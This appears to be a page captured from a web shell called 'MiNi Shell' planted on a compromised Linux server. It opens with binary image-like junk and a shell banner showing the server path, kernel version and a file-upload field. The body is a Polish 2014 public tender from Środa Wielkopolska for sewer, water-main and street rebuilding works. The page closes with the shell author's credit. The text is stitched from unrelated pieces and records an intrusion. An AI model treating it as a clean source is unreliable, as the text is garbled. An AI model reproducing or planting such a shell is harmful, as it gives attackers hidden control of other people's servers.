JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141016/218925-N-2014.html

<p class="kh_header"><b>Środa Wielkopolska: Rozbudowa kolektorów sanitarnych z odbudową ulic w aglomeracji Środa Wielkopolska</b><br>
<b>Numer ogłoszenia: 218925 - 2014; data zamieszczenia: 16.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Środzie Wlkp. , ul. Ignacego Daszyńskiego 5, 63-000 Środa Wielkopolska, woj. wielkopolskie, tel. 061 2867700, faks 061 2867702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sroda.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa kolektorów sanitarnych z odbudową ulic w aglomeracji Środa Wielkopolska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na 2 Części, które rozpatrywane będą odrębnie. Każdy z wykonawców może złożyć ofertę kompleksową na wszystkie część lub ofertę na wybraną część. 1 CZĘŚĆ Nr I: Rozbudowa kolektorów sanitarnych z odbudową ulic w aglomeracji Środa Wielkopolska obejmująca następujące zadania:

ZADANIE NR 1: Budowa kanalizacji sanitarnej i kanalizacji deszczowej z przyłączami, budową i podłączeniem wpustów deszczowych oraz przebudową nawierzchni drogi w ul. Dąbrowskiego w Środzie Wielkopolskiej na odcinku od ul. Wałowej do ul. Lipowej.
Kanalizacja sanitarna na odcinku od S46 do S52:
-	regulacja wykonanych studni z montażem włazów z logo zamawiającego
-	zagęszczenia zasypki istniejących kanałów 7 sztuk 
-	 przyłącza z rur PCV-S dz x e 160x4,7mm wraz ze studzienką O 425 mm 9 sztuk o dł. łącznej około  67,0 m

Kanalizacja deszczowa na odcinku od D51 do D43 wykonana z rur:
-	przyłącza z rur PCV-S dz x e=200 x 5,9mm wraz ze studzienką O 425 mm 11 sztuk o długości łącznej około 78,0 m
-	przyłącza do wpustów  ulicznych z rur PCV-S dz x e=200 x 5,9mm wraz z wpustami ulicznymi O 500 mm	8 sztuk, łączna długość podłączeń około 36,0 m
-	regulacja wykonanych studni z montażem włazów z logo zamawiającego 
-	zagęszczenia zasypki istniejących kanałów	9 sztuk

Kanalizacja sanitarna (łącznik) na odcinku od S46 do S44, wykonana z rur:
-	 regulacja wykonanych studni z montażem włazów z logo zamawiającego 1 sztuka

Przebudowa nawierzchni ul. Dąbrowskiego (na odcinku od ul .Wałowej do Lipowej)
-	wykonanie nowej nawierzchni wraz  jezdnią z kostki kamiennej 9/11 lub płytki kamienne 30x30 wraz z okrawężnikowaniem kamiennym oraz nawierzchni chodników z kostki betonowej pokrytej naturalnymi kruszczycami uzyskanymi metodą płukania. Nawierzchnia miejsc postojowych z istniejącego kamienia 16/18 z rozbiórki. Oznakowanie pionowe i poziome.
Uwaga: Zamawiający informuję,  że nawierzchnia jezdni została rozebrana. W związku z tym zakres prac w powyższym zadaniu nie obejmuję wykonania rozbiórki jezdni.	około 2160,0 m2

ZADANIE NR 2: Budowa kanalizacji sanitarnej z przyłączami oraz przebudową nawierzchni drogi w ul. Lipowej, Niedziałkowskiego, 20 Października w Środzie Wielkopolskiej.

Kanalizacja sanitarna na odcinku od S42 do S44 oraz od S28 do S29, wykonana z rur:
-	kanalizacja sanitarna z rur PCV-S dz x e  315x9,2mm	dł. około 39,50 m
-	 przyłącza z rur PCV-S dz x e 160x4,7mm wraz ze studzienką O 425 mm	9 sztuk o dł. łącznej około  74,0 m
-	 studzienki kanalizacyjne z kręgów betonowych prefabrykowanych  O 1000 mm	4 sztuk
-	regulacja wykonanych studni z montażem włazów z logo zamawiającego
-	zagęszczenia zasypki istniejących kanałów	1 sztuka 

Przebudowa nawierzchni ul. Lipowej
-	wykonanie nowej nawierzchni jezdni z istniejącej kostki kamiennej pochodzącej z rozbiórki oraz nowej zakupionej przez wykonawcę wraz z okrawężnikowaniem betonowym oraz wykonanie nawierzchni chodników i wjazdów i zatok postojowych z kostki brukowej. Oznakowanie pionowe i poziome.	około 4851,0 m2

ZADANIE NR 14: Wymiana sieci wodociągowej wraz z przyłączami w ul. Dąbrowskiego w Środzie Wielkopolskiej (odcinek od Wałowej do Lipowej)
Siec wodociągowa w ul. Dąbrowskiego na odcinku od W1 do W21, wykonana z rur:
-	Siec wodociągowa z rur PE100 Dz 180x 10,7 SDR 17	dł. 70,0m 
-	 Przyłącza wodociągowe z rur PE100 Dz 32x 2,0 SDR 17 12 szt., dł. 88,04m
-	Przyłącza wodociągowe z rur PE100 Dz 40x 2,4 SDR 17	1 szt., 5,20m
-	Przyłącza wodociągowe z rur PE100 Dz 50x 3,0 SDR 17	5 szt., 40,03m

ZADANIE NR 15: Wymiana sieci wodociągowej wraz z przyłączami w ul. Lipowej w Środzie Wielkopolskiej.
Siec wodociągowa w ul. Lipowej na odcinku od W1 do W38, wykonana z rur:
-	Siec wodociągowa z rur PE100 Dz 110x6,6 SDR 17	dł. 183,0m 
-	 Siec wodociągowa z rur PE100 Dz   90x5,4 SDR 17	dł. 22,0m
-	 Przyłącza wodociągowe z rur PE100 Dz 32x 2,0 SDR 17 	9 szt., dł. 142,0m
-	Przyłącza wodociągowe z rur PE100 Dz 40x 2,4 SDR 17	9 szt., 119,0m
-	Przyłącza wodociągowe z rur PE100 Dz 50x 3,0 SDR 17	3 szt., 144,0m
-	Przyłącza wodociągowe z rur PE100 Dz 63x3,8 SDR 17	3 szt., 106,0m
-	Przyłącza wodociągowe z rur PE100 90x5,4 SDR 17	2 szt., 33,2m
-	Przyłącza wodociągowe z rur PE100 Dz 110x 6,6 SDR 17	1 szt., 15,0m

2. CZĘŚĆ Nr II: Rozbudowa kolektorów sanitarnych z odbudową ulic w aglomeracji Środa Wielkopolska obejmująca następujące zadanie:
ZADANIE NR 7: Budowa kanalizacji sanitarnej z przyłączami, przepompownią ścieków oraz odbudową nawierzchni drogi w ul. Wrzesińskiej w Środzie Wielkopolskiej. 
Kanalizacja sanitarna na odcinku od S185 do P1, od S245 do S246, wykonana z rur:
-	kanalizacja sanitarna z rur PCV-S dz x e 315x9,2mm	dł. około 2,5 m
-	kanalizacja sanitarna z rur PCV-S dz x e 250x7,3mm	dł. około 139,5 m
-	kanalizacja sanitarna z rur PCV-S dz x e 200x5,9mm	dł. około 7,5 m
-	 przyłącze z rur PCV-S dz x e 160x4,7mm wraz ze studzienką O 425 mm	1 szt. o dł. łącznej około  10,0 m
-	 studzienki kanalizacyjne z kręgów betonowych prefabrykowanych  O 1000 mm	6 sztuk
-	 PE100 SDR 17 dz x e = 90 x 5,4 mm PN10	dł. ok. 6,0 m
-	Przewiert sterowany rurami stalowymi 508 x 14,2 mm	dł. ok. 60,5 m szt. 2
-	Przepompownia:
- wydajność przepompowni: Q=26m3/h
- konstrukcja kręgi betonowo prefabrykowane
- średnica: dn 1000mm
	szt. 1

Odbudowa nawierzchni ul. Wrzesińskiej 
-	odbudowa nawierzchni drogowej  w zakresie rozebranym na potrzeby budowy kanalizacji sanitarnej wraz z przyłączami  z mas mineralno-bitumicznych asfaltowych, wykonanie warstwy ścieralnej na całej szerokości jezdni wraz z okrawężnikowaniem i ściekiem przykrawężnikowym oraz wykonanie chodników i wjazdów z kostki betonowej	około 672,8 m2

Szczegółowy opis przedmiotu zamówienia określa specyfikacja techniczna wykonania i odbioru robót budowlanych (STWiORB) oraz dokumentacja projektowa - stanowiące załączniki do SIWZ. 
 Zakres zamówienia obejmuje wykonanie sieci kanalizacji sanitarnej wraz z przyłączami, sieci kanalizacji deszczowej wraz z przyłączami, sieci wodociągowej wraz z przyłączami, budowę przepompowni ścieków oraz odbudowę nawierzchni drogowej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.13.00-8, 45.23.32.52-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania w/w warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do oferty należy dołączyć wykaz robót budowlanych wykonanych w okresie 5 lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
 Dla Części Nr I:
 W celu potwierdzenia spełnienia warunku wiedzy i doświadczenia wykonawca w wykazie    
Robót budowlanych musi wykazać, że wykonał należycie  minimum:
- 1 zrealizowane zadanie, polegające na wybudowaniu sieci wodociągowej dł. min. 0,5 km,
- 1 zrealizowane zadanie, polegające na wykonaniu nawierzchni z kostki kamiennej lub brukowej min 1.500 m2
 Dla Części Nr II:
W celu potwierdzenia spełnienia warunku wiedzy i doświadczenia wykonawca w wykazie robót budowlanych musi wykazać że wykonał należycie  minimum: 
- 1 zrealizowane zadanie, polegające na wybudowaniu kanalizacji o łącznej długości  min. 150 m  wraz z przepompownią ścieków</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania w/w warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania w/w warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania w/w warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy stanowiący załącznik Nr 1 do SIWZ. 2) Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo (jeśli dotyczy). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy; 3) Pełnomocnictwo w oryginale do podpisywania oferty lub kserokopia pełnomocnictwa poświadczona przez notariusza, z którego wynika prawo do podpisania oferty, względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów (pełnomocnictwo nie jest wymagane, jeżeli podpisujący jest lub są właścicielami firmy lub jeżeli są oni wymienieni z imienia i nazwiska w dokumencie rejestrowym). 4) W przypadku złożenia przez Wykonawców dokumentów zawierających dane przedstawione w walutach obcych, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs Narodowego Banku Polskiego z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów o których mowa w dziale 6 SIWZ, w myśl zasady spełnia/nie spełnia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, jednakże Zamawiający przewiduje możliwość dokonania zmian umowy w stosunku do treści oferty oraz określa warunki takiej zmiany. Warunki takich zmian określono następująco:
1.1 Zmiana terminu realizacji umowy:
a)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są   konsekwencją winy którejkolwiek ze stron;
b)	Zmiany spowodowane nadzwyczajnymi warunkami tj. niewypały, niewybuchy, wykopaliska archeologiczne;
c)	zmiany będące następstwem wstrzymania robót przez uprawnione organy z przyczyn nie wynikających z winy wykonawcy i zamawiającego,
d)	działania siły wyższej utrudniającej i uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami,
e)	wystąpienia konieczności robót dodatkowych których realizacja ma wpływ na termin wykonania zamówienia, 
f)	wystąpienia okoliczności niezależnych od wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu umowy,
g)	z powodu aktualizacji rozwiązań ze względu na postęp technologiczny (np. wycofanie z   obrotu  materiałów i urządzeń),
h)	z powodu zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
i)	wyjątkowo nie sprzyjających warunków atmosferycznych uniemożliwiających wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązujących przepisów, 
1.2. Pozostałe zmiany:
a)	z powodu zmiany obowiązującej stawki VAT. W przypadku zmiany stawki VAT przez władzę ustawodawczą kwota brutto wynagrodzenia zostanie zmieniona poprzez wprowadzenie odpowiedniej zmieniony  do umowy;
b)	Zmiana osób, podwykonawców przy pomocy których Wykonawca realizuje przedmiot umowy,  na inne legitymujące się co najmniej równoważnym doświadczeniem i uprawnieniami, o których mowa w ustawie Prawo budowlane oraz, które wymagane były przez Zamawiającego. Zmiany te będą dokonywane na podstawie zatwierdzonych wniosków przez strony;
2. Zmiany określone w punkcie 1.1 i 1.2 nie powodują zmiany wynagrodzenia Wykonawcy z wyłączeniem punktu 1.2. lit. a). Okoliczności wymienione w punkcie 1.1 i 1.2 z wyłączeniem punktu 1.2 lit a) stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Zmiany do umowy może zainicjować zarówno Zamawiający jak i Wykonawca, składając pisemny wniosek do drugiej strony, zawierający w szczególności opis zmiany i jej uzasadnienie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.srodawlkp.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Środzie Wielkopolskiej ul. Daszyńskiego 5, 63-000 Środa Wielkopolska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2014 godzina 10:00, miejsce: Urząd Miejski w Środzie Wielkopolskiej ul. Daszyńskiego 5, 63-000 Środa Wielkopolska, pok. nr 214 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej z Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko Priorytet I,Oś - Gospodarka Wodno - Ściekowa Działanie: 1.1. Gospodarka wodno - ściekowa w aglomeracji powyżej 15 tys. RLM.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1 CZĘŚĆ Nr I: Rozbudowa kolektorów sanitarnych z odbudową ulic w aglomeracji Środa Wielkopolska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ Nr I - Rozbudowa kolektorów sanitarnych z odbudową ulic w aglomeracji Środa Wielkopolska obejmująca następujące zadania:
ZADANIE NR 1 Budowa kanalizacji sanitarnej i kanalizacji deszczowej z przyłączami, budową i podłączeniem wpustów deszczowych oraz przebudową nawierzchni drogi w ul. Dąbrowskiego w Środzie Wielkopolskiej na odcinku od ul. Wałowej do ul. Lipowej.
ZADANIE NR 2 Budowa kanalizacji sanitarnej z przyłączami oraz przebudową nawierzchni drogi w ul. Lipowej, Niedziałkowskiego, 20 Października w Środzie Wielkopolskiej.
ZADANIE NR 14 Wymiana sieci wodociągowej wraz z przyłączami w ul. Dąbrowskiego w Środzie Wielkopolskiej (odcinek od Wałowej do Lipowej)
ZADANIE NR 15 Wymiana sieci wodociągowej wraz z przyłączami w ul. Lipowej w Środzie Wielkopolskiej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.13.00-8, 45.23.32.52-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rozbudowa kolektorów sanitarnych z odbudową ulic w aglomeracji Środa Wielkopolska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - Rozbudowa kolektorów sanitarnych z odbudową ulic w aglomeracji Środa Wielkopolska obejmująca następujące zadanie:
ZADANIE NR 7: Budowa kanalizacji sanitarnej z przyłączami, przepompownią ścieków oraz odbudową nawierzchni drogi w ul. Wrzesińskiej w Środzie Wielkopolskiej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.13.00-8, 45.23.32.52-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com